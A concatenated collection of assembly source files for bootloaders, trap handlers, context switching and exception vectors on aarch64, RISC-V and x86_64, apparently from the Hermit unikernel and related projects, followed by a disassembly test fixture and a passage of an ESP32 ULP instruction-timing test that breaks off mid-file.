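# the loader; boot_pml4[511] points at boot_pml4 itself (recursive entry).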
|
moehr1z/loader | 1,619 | src/arch/aarch64/entry.s | // Adapted from https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/02_runtime_init/src/_arch/aarch64/cpu/boot.s
.equ _core_id_mask, 0xff
.section .text._start
_start:
// Only proceed on the boot core. Park it otherwise.
mrs x1, mpidr_el1
and x1, x1, _core_id_mask
mov x2, xzr // Assume CPU 0 is responsible for booting
cmp x1, x2
b.ne 1f
// If execution reaches here, it is the boot core. Now, prepare the jump to Rust code.
// This loads the physical address of the stack end. For details see
// https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/16_virtual_mem_part4_higher_half_kernel/src/bsp/raspberrypi/link.ld
adrp x4, __boot_core_stack_end_exclusive
add x4, x4, #:lo12:__boot_core_stack_end_exclusive
mov sp, x4
// Jump to Rust code.
b _start_rust
// Infinitely wait for events (aka "park the core").
1: wfe
b 1b
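// Note: masking mpidr_el1 with 0xff extracts Aff0, the core number within a
// cluster, so on single-cluster boards only core 0 falls through to booting.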
.size _start, . - _start
.type _start, function
.global _start
.section .bss
.global l0_pgtable
.global l1_pgtable
.global l2_pgtable
.global l2k_pgtable
.global l3_pgtable
.global L0mib_pgtable
.align 12
l0_pgtable:
.space 512*8, 0
l1_pgtable:
.space 512*8, 0
l2_pgtable:
.space 512*8, 0
l2k_pgtable:
.space 512*8, 0
l3_pgtable:
.space 512*8, 0
L0mib_pgtable:
.space 512*8, 0
L2mib_pgtable:
.space 512*8, 0
L4mib_pgtable:
.space 512*8, 0
L6mib_pgtable:
.space 512*8, 0
L8mib_pgtable:
.space 512*8, 0
L10mib_pgtable:
.space 512*8, 0
L12mib_pgtable:
.space 512*8, 0
L14mib_pgtable:
.space 512*8, 0
L16mib_pgtable:
.space 512*8, 0
L18mib_pgtable:
.space 512*8, 0 |
mm-zk/eravm_risc | 3,344 | asm/asm_reduced.S | /*
Entry point of all programs (_start).
It initializes DWARF call frame information, the stack pointer, the
frame pointer (needed for closures to work in start_rust) and the global
pointer. Then it calls _start_rust.
*/
.section .init, "ax"
.global _start
_start:
/* Jump to the absolute address defined by the linker script. */
// for 32bit
# lui ra, %hi(_abs_start)
# jr %lo(_abs_start)(ra)
la ra, _abs_start
jr ra
_abs_start:
.cfi_startproc
.cfi_undefined ra
.option push
.option norelax
la gp, __global_pointer$
.option pop
// Assume single core, and put SP to the very top address of the stack region
la sp, _sstack
// Set frame pointer
add s0, sp, zero
jal zero, _start_rust
.cfi_endproc
/*
Machine trap entry point (_machine_start_trap)
*/
.section .trap, "ax"
.global machine_default_start_trap
.align 4
machine_default_start_trap:
// We assume that exception stack is always saved to MSCRATCH
// so we swap it with x31
csrrw x31, mscratch, x31
// write to exception stack
# sw x31, -4(sp)
sw x30, -8(x31)
sw x29, -12(x31)
sw x28, -16(x31)
sw x27, -20(x31)
sw x26, -24(x31)
sw x25, -28(x31)
sw x24, -32(x31)
sw x23, -36(x31)
sw x22, -40(x31)
sw x21, -44(x31)
sw x20, -48(x31)
sw x19, -52(x31)
sw x18, -56(x31)
sw x17, -60(x31)
sw x16, -64(x31)
sw x15, -68(x31)
sw x14, -72(x31)
sw x13, -76(x31)
sw x12, -80(x31)
sw x11, -84(x31)
sw x10, -88(x31)
sw x9, -92(x31)
sw x8, -96(x31)
sw x7, -100(x31)
sw x6, -104(x31)
sw x5, -108(x31)
sw x4, -112(x31)
sw x3, -116(x31)
sw x2, -120(x31)
sw x1, -124(x31)
// we will not restore it, so we are ok to avoid write
# sw x0, -128(x31)
// move valid sp into a0,
mv a0, x31
csrrw x31, mscratch, x0
sw x31, -4(a0)
// restore sp
mv sp, a0
// sp is valid now
addi sp, sp, -128
// pass pointer as first argument
add a0, sp, zero
jal ra, _machine_start_trap_rust
// set return address into mepc
csrw mepc, a0
// save original SP to mscratch for now
lw a0, 8(sp) // it's original sp that we saved in the stack
csrw mscratch, a0 // save it for now
// restore everything we saved
// it's illegal instruction, so we skip. Anyway can not overwrite x0
# lw x0, 0(sp)
lw x1, 4(sp)
# lw x2, 8(sp) // do not overwrite SP yet
lw x3, 12(sp)
lw x4, 16(sp)
lw x5, 20(sp)
lw x6, 24(sp)
lw x7, 28(sp)
lw x8, 32(sp)
lw x9, 36(sp)
lw x10, 40(sp)
lw x11, 44(sp)
lw x12, 48(sp)
lw x13, 52(sp)
lw x14, 56(sp)
lw x15, 60(sp)
lw x16, 64(sp)
lw x17, 68(sp)
lw x18, 72(sp)
lw x19, 76(sp)
lw x20, 80(sp)
lw x21, 84(sp)
lw x22, 88(sp)
lw x23, 92(sp)
lw x24, 96(sp)
lw x25, 100(sp)
lw x26, 104(sp)
lw x27, 108(sp)
lw x28, 112(sp)
lw x29, 116(sp)
lw x30, 120(sp)
lw x31, 124(sp)
addi sp, sp, 128
// we popped everything from the stack
// now save current exception SP to mscratch,
// and put original SP back
csrrw sp, mscratch, sp
mret
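// mscratch protocol, summarized: outside the handler, mscratch holds the top
// of the exception stack; on entry it is swapped with x31, the interrupted
// registers are spilled below it, and the final csrrw restores mscratch and
// the original sp before mret.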
/* Make sure there is an abort when linking */
.section .text.abort
.globl abort
abort:
j abort |
moehr1z/loader | 5,267 | src/arch/x86_64/entry_fc.s | # This is the kernel's entry point, if Hermit is running with
# FireCracker. FireCracker assumes a 64-bit Linux kernel.
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
.section .mboot, "a"
.align 8
.align 4
# we already need a valid GDT to switch to 64-bit mode
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
mov [boot_params], esi
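# Per the Linux 32-bit boot protocol (which Firecracker appears to follow,
# as the header above suggests), esi holds the physical address of the
# boot_params structure; it is stashed here for later use by loader_main.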
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE mode
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU monitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processor's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.global boot_params
.align 8
boot_params:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
|
moehr1z/hermit-rs | 3,451 | kernel/src/arch/riscv64/kernel/switch.s | .section .text
.global switch_to_task
.global task_start
.extern task_entry
// .extern set_current_kernel_stack
.align 16
// This function should only be called if the fp registers are clean
switch_to_task:
// a0 = old_stack => the address to store the old rsp
// a1 = new_stack => stack pointer of the new task
addi sp, sp, -(31*8)
sd x31, (8*30)(sp)
sd x30, (8*29)(sp)
sd x29, (8*28)(sp)
sd x28, (8*27)(sp)
sd x27, (8*26)(sp)
sd x26, (8*25)(sp)
sd x25, (8*24)(sp)
sd x24, (8*23)(sp)
sd x23, (8*22)(sp)
sd x22, (8*21)(sp)
sd x21, (8*20)(sp)
sd x20, (8*19)(sp)
sd x19, (8*18)(sp)
sd x18, (8*17)(sp)
sd x17, (8*16)(sp)
sd x16, (8*15)(sp)
sd x15, (8*14)(sp)
sd x14, (8*13)(sp)
sd x13, (8*12)(sp)
sd x12, (8*11)(sp)
sd x11, (8*10)(sp)
sd x10, (8*9)(sp)
sd x9, (8*8)(sp)
sd x8, (8*7)(sp)
sd x7, (8*6)(sp)
sd x6, (8*5)(sp)
sd x5, (8*4)(sp)
sd x4, (8*3)(sp)
//sd x3, (8*2)(sp)
//sd x2, (8*1)(sp)
sd x1, (8*0)(sp)
//Store floating point registers
//TODO: Save only when changed
# fsd f0, (8*31)(sp)
# fsd f1, (8*32)(sp)
# fsd f2, (8*33)(sp)
# fsd f3, (8*34)(sp)
# fsd f4, (8*35)(sp)
# fsd f5, (8*36)(sp)
# fsd f6, (8*37)(sp)
# fsd f7, (8*38)(sp)
# fsd f8, (8*39)(sp)
# fsd f9, (8*40)(sp)
# fsd f10, (8*41)(sp)
# fsd f11, (8*42)(sp)
# fsd f12, (8*43)(sp)
# fsd f13, (8*44)(sp)
# fsd f14, (8*45)(sp)
# fsd f15, (8*46)(sp)
# fsd f16, (8*47)(sp)
# fsd f17, (8*48)(sp)
# fsd f18, (8*49)(sp)
# fsd f19, (8*50)(sp)
# fsd f20, (8*51)(sp)
# fsd f21, (8*52)(sp)
# fsd f22, (8*53)(sp)
# fsd f23, (8*54)(sp)
# fsd f24, (8*55)(sp)
# fsd f25, (8*56)(sp)
# fsd f26, (8*57)(sp)
# fsd f27, (8*58)(sp)
# fsd f28, (8*59)(sp)
# fsd f29, (8*60)(sp)
# fsd f30, (8*61)(sp)
# fsd f31, (8*62)(sp)
# frcsr t0
# sd t0, (8*63)(sp)
// Store current stack pointer with saved context in `_dst`.
sd sp, (0)(a0)
// Set stack pointer to supplied `_src`.
mv sp, a1
//set current kernel stack
call set_current_kernel_stack
# // Restore fp regs
# fld f0, (8*31)(sp)
# fld f1, (8*32)(sp)
# fld f2, (8*33)(sp)
# fld f3, (8*34)(sp)
# fld f4, (8*35)(sp)
# fld f5, (8*36)(sp)
# fld f6, (8*37)(sp)
# fld f7, (8*38)(sp)
# fld f8, (8*39)(sp)
# fld f9, (8*40)(sp)
# fld f10, (8*41)(sp)
# fld f11, (8*42)(sp)
# fld f12, (8*43)(sp)
# fld f13, (8*44)(sp)
# fld f14, (8*45)(sp)
# fld f15, (8*46)(sp)
# fld f16, (8*47)(sp)
# fld f17, (8*48)(sp)
# fld f18, (8*49)(sp)
# fld f19, (8*50)(sp)
# fld f20, (8*51)(sp)
# fld f21, (8*52)(sp)
# fld f22, (8*53)(sp)
# fld f23, (8*54)(sp)
# fld f24, (8*55)(sp)
# fld f25, (8*56)(sp)
# fld f26, (8*57)(sp)
# fld f27, (8*58)(sp)
# fld f28, (8*59)(sp)
# fld f29, (8*60)(sp)
# fld f30, (8*61)(sp)
# fld f31, (8*62)(sp)
# ld t0, (8*63)(sp)
# fscsr t0
// Restore context
ld x1, (8*0)(sp)
//ld x2, (8*1)(sp)
//ld x3, (8*2)(sp)
ld x4, (8*3)(sp)
ld x5, (8*4)(sp)
ld x6, (8*5)(sp)
ld x7, (8*6)(sp)
ld x8, (8*7)(sp)
ld x9, (8*8)(sp)
ld x10, (8*9)(sp)
ld x11, (8*10)(sp)
ld x12, (8*11)(sp)
ld x13, (8*12)(sp)
ld x14, (8*13)(sp)
ld x15, (8*14)(sp)
ld x16, (8*15)(sp)
ld x17, (8*16)(sp)
ld x18, (8*17)(sp)
ld x19, (8*18)(sp)
ld x20, (8*19)(sp)
ld x21, (8*20)(sp)
ld x22, (8*21)(sp)
ld x23, (8*22)(sp)
ld x24, (8*23)(sp)
ld x25, (8*24)(sp)
ld x26, (8*25)(sp)
ld x27, (8*26)(sp)
ld x28, (8*27)(sp)
ld x29, (8*28)(sp)
ld x30, (8*29)(sp)
ld x31, (8*30)(sp)
addi sp, sp, (31*8)
ret
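// Note: x2 (sp) is saved separately via 'sd sp, (0)(a0)' above rather than
// in the frame, x3 (gp) is left alone (shared across tasks, presumably),
// and x0 is hardwired to zero, which is why those slots are commented out.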
.align 16
task_start:
mv sp, a2
j task_entry
|
moehr1z/hermit-rs | 4,619 | kernel/src/arch/x86_64/kernel/boot.s | # This is the entry point for the application processors.
# It is loaded at 0x8000 by Hermit and filled with parameters.
# It does the switch from Real Mode -> Protected Mode -> Long Mode,
# sets up CR3 for this CPU, and then calls into _start.
#
# In contrast to this self-contained entry point, _start is linked
# to the rest of Hermit and thus has access to all exported symbols
# (like the actual Rust entry point).
.intel_syntax noprefix
.set CR0_PG, 1 << 31
.set CR4_PAE, 1 << 5
.set MSR_EFER, 0xC0000080
.set EFER_LME, 1 << 8
.set EFER_NXE, 1 << 11
.code16
.section .text
.global _start
_start:
jmp _rmstart
# PARAMETERS
.align 8
entry_point: .8byte 0xDEADC0DE
cpu_id: .4byte 0xC0DECAFE
boot_info: .8byte 0xBEEFBEEF
pml4: .4byte 0xDEADBEEF
pad: .4byte 0
_rmstart:
cli
lgdt [gdtr]
# switch to protected mode by setting PE bit
mov eax, cr0
or al, 0x1
mov cr0, eax
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# far jump to the 32-bit code
ljmpl $codesel, $_pmstart
.intel_syntax noprefix
.code32
.align 4
_pmstart:
xor eax, eax
mov ax, OFFSET datasel
mov ds, eax
mov es, eax
mov fs, eax
mov gs, eax
mov ss, eax
jmp short stublet
2:
jmp 2b
# GDT for the protected mode
.align 4
gdtr: # descriptor table
.2byte gdt_end - gdt - 1 # limit
.4byte gdt # base address
gdt:
.8byte 0 # null descriptor
.set codesel, . - gdt
.2byte 0xFFFF # segment size 0..15
.2byte 0 # segment address 0..15
.byte 0 # segment address 16..23
.byte 0x9A # access permissions and type
.byte 0xCF # additional information and segment size 16...19
.byte 0 # segment address 24..31
.set datasel, . - gdt
.2byte 0xFFFF # segment size 0..15
.2byte 0 # segment address 0..15
.byte 0 # segment address 16..23
.byte 0x92 # access permissions and type
.byte 0xCF # additional information and segment size 16...19
.byte 0 # segment address 24..31
gdt_end:
.align 4
GDTR64:
.2byte GDT64_end - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
# we need a new GDT to switch to 64-bit mode
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64_end:
.align 4
stublet:
# Enable PAE mode.
mov eax, cr4
or eax, CR4_PAE
mov cr4, eax
# Set the address to PML4 in CR3.
mov eax, [pml4]
mov cr3, eax
# Enable x86-64 Compatibility Mode by setting EFER_LME.
# Also enable early access to NO_EXECUTE-protected memory through EFER_NXE.
mov ecx, MSR_EFER
rdmsr
or eax, EFER_LME | EFER_NXE
wrmsr
# Enable Paging.
mov eax, cr0
or eax, CR0_PG
mov cr0, eax
# Load the 64-bit global descriptor table.
lgdt [GDTR64]
mov ax, OFFSET GDT64.Data
mov ss, eax
mov ds, eax
mov es, eax
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmpl $GDT64.Code, $start64
.intel_syntax noprefix
.code64
.align 8
start64:
# forward address to boot info
mov rdi, [boot_info]
mov esi, [cpu_id]
# Jump to _start
jmp [entry_point]
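# The PARAMETERS block near _start (entry_point, cpu_id, boot_info, pml4) is
# patched in place before this code runs, which is why it holds recognizable
# placeholders such as 0xDEADC0DE; start64 merely forwards those values.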
|
moehr1z/hermit-rs | 6,784 | kernel/src/arch/aarch64/kernel/start.s | .section .text
.extern do_bad_mode
.extern do_irq
.extern do_fiq
.extern do_sync
.extern do_error
.extern get_last_stack_pointer
.macro trap_entry spsel
stp x29, x30, [sp, #-16]!
stp x27, x28, [sp, #-16]!
stp x25, x26, [sp, #-16]!
stp x23, x24, [sp, #-16]!
stp x21, x22, [sp, #-16]!
stp x19, x20, [sp, #-16]!
stp x17, x18, [sp, #-16]!
stp x15, x16, [sp, #-16]!
stp x13, x14, [sp, #-16]!
stp x11, x12, [sp, #-16]!
stp x9, x10, [sp, #-16]!
stp x7, x8, [sp, #-16]!
stp x5, x6, [sp, #-16]!
stp x3, x4, [sp, #-16]!
stp x1, x2, [sp, #-16]!
mrs x22, tpidr_el0
stp x22, x0, [sp, #-16]!
mrs x23, sp_el0
mrs x22, spsr_el1
stp x22, x23, [sp, #-16]!
mrs x23, elr_el1
mov x22, #\spsel
stp x22, x23, [sp, #-16]!
.endm
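// Resulting frame, from sp upward: spsel/elr_el1, spsr_el1/sp_el0,
// tpidr_el0/x0, then x1..x30 stored in ascending pairs; the handlers below
// receive a pointer to this frame in x0.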
.macro trap_exit
ldp x22, x23, [sp], #16
msr elr_el1, x23
ldp x22, x23, [sp], #16
msr spsr_el1, x22
msr sp_el0, x23
ldp x22, x0, [sp], #16
msr tpidr_el0, x22
ldp x1, x2, [sp], #16
ldp x3, x4, [sp], #16
ldp x5, x6, [sp], #16
ldp x7, x8, [sp], #16
ldp x9, x10, [sp], #16
ldp x11, x12, [sp], #16
ldp x13, x14, [sp], #16
ldp x15, x16, [sp], #16
ldp x17, x18, [sp], #16
ldp x19, x20, [sp], #16
ldp x21, x22, [sp], #16
ldp x23, x24, [sp], #16
ldp x25, x26, [sp], #16
ldp x27, x28, [sp], #16
ldp x29, x30, [sp], #16
.endm
/*
* Exception vector entry
*/
.macro ventry label
.align 7
b \label
.endm
.macro invalid, reason
mov x0, sp
mov x1, #\reason
b do_bad_mode
.endm
/*
* SYNC exception handler.
*/
.align 6
el1_sync:
trap_entry 1
mov x0, sp
bl do_sync
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sync, .-el1_sync
.type el1_sync, @function
/*
* IRQ handler.
*/
.align 6
el1_irq:
trap_entry 1
mov x0, sp
bl do_irq
cmp x0, 0
b.eq 1f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
1:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_irq, .-el1_irq
.type el1_irq, @function
/*
* FIQ handler.
*/
.align 6
el1_fiq:
trap_entry 1
mov x0, sp
bl do_fiq
cmp x0, 0
b.eq 2f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
2:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_fiq, .-el1_fiq
.type el1_fiq, @function
.align 6
el1_error:
trap_entry 1
mov x0, sp
bl do_error
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_error, .-el1_error
.type el1_error, @function
/*
* SYNC exception handler with SP0.
*/
.align 6
el1_sp0_sync:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_sync
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_sync, .-el1_sp0_sync
.type el1_sp0_sync, @function
/*
* IRQ handler with SP0.
*/
.align 6
el1_sp0_irq:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_irq
cmp x0, 0
b.eq 3f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
3:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_irq, .-el1_sp0_irq
.type el1_sp0_irq, @function
/*
* FIQ handler with SP0.
*/
.align 6
el1_sp0_fiq:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_fiq
cmp x0, 0
b.eq 4f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
4:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_fiq, .-el1_sp0_fiq
.type el1_sp0_fiq, @function
.align 6
el1_sp0_error:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_error
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_error, .-el1_sp0_error
.type el1_sp0_error, @function
el0_sync_invalid:
invalid 0
.type el0_sync_invalid, @function
el0_irq_invalid:
invalid 1
.type el0_irq_invalid, @function
el0_fiq_invalid:
invalid 2
.type el0_fiq_invalid, @function
el0_error_invalid:
invalid 3
.type el0_error_invalid, @function
el1_sync_invalid:
invalid 0
.type el1_sync_invalid, @function
el1_irq_invalid:
invalid 1
.type el1_irq_invalid, @function
el1_fiq_invalid:
invalid 2
.type el1_fiq_invalid, @function
el1_error_invalid:
invalid 3
.type el1_error_invalid, @function
/* start of the data section */
.section .rodata
.align 11
.global vector_table
vector_table:
/* Current EL with SP0 */
ventry el1_sp0_sync // Synchronous EL1t
ventry el1_sp0_irq // IRQ EL1t
ventry el1_sp0_fiq // FIQ EL1t
ventry el1_sp0_error // Error EL1t
/* Current EL with SPx */
ventry el1_sync // Synchronous EL1h
ventry el1_irq // IRQ EL1h
ventry el1_fiq // FIQ EL1h
ventry el1_error // Error EL1h
/* Lower EL using AArch64 */
ventry el0_sync_invalid // Synchronous 64-bit EL0
ventry el0_irq_invalid // IRQ 64-bit EL0
ventry el0_fiq_invalid // FIQ 64-bit EL0
ventry el0_error_invalid // Error 64-bit EL0
/* Lower EL using AArch32 */
ventry el0_sync_invalid // Synchronous 32-bit EL0
ventry el0_irq_invalid // IRQ 32-bit EL0
ventry el0_fiq_invalid // FIQ 32-bit EL0
ventry el0_error_invalid // Error 32-bit EL0
.size vector_table, .-vector_table
|
MohannedAhmed67/Edits | 1,766 | tests/tests_data/preprocessing/standardize_test_input_1.s |
datasets/formatted/output/ADD_1_TO_A_GIVEN_NUMBER_1.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f_gold(int)>:
f_gold(int):
0: endbr64
4: pushq %rbp
5: movq %rsp,%rbp
8: movl %edi,-0x4(%rbp)
b: movl -0x4(%rbp),%eax
e: addl $0x1,%eax
11: popq %rbp
12: retq
0000000000000013 <__static_initialization_and_destruction_0(int, int)>:
__static_initialization_and_destruction_0(int, int):
13: endbr64
17: pushq %rbp
18: movq %rsp,%rbp
1b: subq $0x10,%rsp
1f: movl %edi,-0x4(%rbp)
22: movl %esi,-0x8(%rbp)
25: cmpl $0x1,-0x4(%rbp)
29: jne 66 <__static_initialization_and_destruction_0(int, int)+0x53>
2b: cmpl $0xffff,-0x8(%rbp)
32: jne 66 <__static_initialization_and_destruction_0(int, int)+0x53>
34: leaq 0x0(%rip),%rax # 3b <__static_initialization_and_destruction_0(int, int)+0x28>
3b: movq %rax,%rdi
3e: callq 43 <__static_initialization_and_destruction_0(int, int)+0x30>
43: leaq 0x0(%rip),%rax # 4a <__static_initialization_and_destruction_0(int, int)+0x37>
4a: movq %rax,%rdx
4d: leaq 0x0(%rip),%rax # 54 <__static_initialization_and_destruction_0(int, int)+0x41>
54: movq %rax,%rsi
57: movq 0x0(%rip),%rax # 5e <__static_initialization_and_destruction_0(int, int)+0x4b>
5e: movq %rax,%rdi
61: callq 66 <__static_initialization_and_destruction_0(int, int)+0x53>
66: nop
67: leaveq
68: retq
0000000000000069 <_GLOBAL__sub_I__Z6f_goldi>:
_GLOBAL__sub_I__Z6f_goldi():
69: endbr64
6d: pushq %rbp
6e: movq %rsp,%rbp
71: movl $0xffff,%esi
76: movl $0x1,%edi
7b: callq 13 <__static_initialization_and_destruction_0(int, int)>
80: popq %rbp
81: retq
|
Molorius/ulp-speed-test | 3,790 | main/main.S |
#define HIGH() reg_wr 257, 26, 26, 1;
#define LOW() reg_wr 258, 26, 26, 1;
#define LOOPS 1024
// this does not affect any flags
#define TEST(code...) \
HIGH() \
code; \
LOW()
#define ALU_REG_TEST(ins) TEST(ins r0, r0, r0)
#define ALU_IMM_TEST(ins) TEST(ins r0, r0, 0)
#define JUMP_0F_TEST(code...) \
TEST( \
code; \
0: ; \
)
#define JUMP_R0_TEST(code...) \
move r0, 0f; \
JUMP_0F_TEST(code)
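// For example, ALU_REG_TEST(add) expands (roughly) to:
//   reg_wr 257, 26, 26, 1 // HIGH(): drive the pulse pin high
//   add r0, r0, r0        // instruction under test
//   reg_wr 258, 26, 26, 1 // LOW(): drive the pin low again
// so the measured pulse width is one instruction's cost on top of the
// fixed overhead captured by the empty TEST() baseline below.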
.text
.global entry
entry:
move r2, 0 // r2 should always be 0
// enable rtc_gpio12 / gpio2 for pulse
reg_wr 295, 19, 19, 1
reg_wr 295, 18, 17, 0
// set to low
LOW()
// enable output
reg_wr 260, 26, 26, 1
tests:
// check if we looped enough times
move r3, loop_count
ld r0, r3, 0 // load loop count
sub r0, r0, 1 // decrement
st r0, r3, 0 // store updated count
jump end, ov // exit if we counted enough times
move r0, 0
move r1, 0
move r2, 0
move r3, 0
// base pulse
TEST() // 0
// ALU operations among registers
ALU_REG_TEST(add) // 1
ALU_REG_TEST(sub) // 2
ALU_REG_TEST(and) // 3
ALU_REG_TEST(or) // 4
TEST(move r0, r0) // 5
ALU_REG_TEST(lsh) // 6
ALU_REG_TEST(rsh) // 7
// ALU operations with immediate
ALU_IMM_TEST(add) // 8
ALU_IMM_TEST(sub) // 9
ALU_IMM_TEST(and) // 10
ALU_IMM_TEST(or) // 11
TEST(move r0, 0) // 12
ALU_IMM_TEST(lsh) // 13
ALU_IMM_TEST(rsh) // 14
// stage counter
TEST(stage_inc 1) // 15
TEST(stage_dec 1) // 16
TEST(stage_rst) // 17
// load data
move r3, test_data
TEST(ld r0, r3, 0) // 18
// store data
TEST(st r0, r3, 0) // 19
// jump
JUMP_R0_TEST(jump r0) // 20
// jump ov with overflow
sub r0, r2, 1
JUMP_R0_TEST(jump r0, ov) // 21
// jump ov without overflow
add r0, r0, 0
JUMP_R0_TEST(jump r0, ov) // 22
// jump eq with equal
sub r0, r0, r0
JUMP_R0_TEST(jump r0, eq) // 23
// jump eq without equal
add r0, r2, 1
JUMP_R0_TEST(jump r0, eq) // 24
// jump imm
JUMP_0F_TEST(jump 0f) // 25
// jump imm ov with overflow
sub r0, r2, 1
JUMP_0F_TEST(jump 0f, ov) // 26
// jump imm ov without overflow
add r0, r0, 0
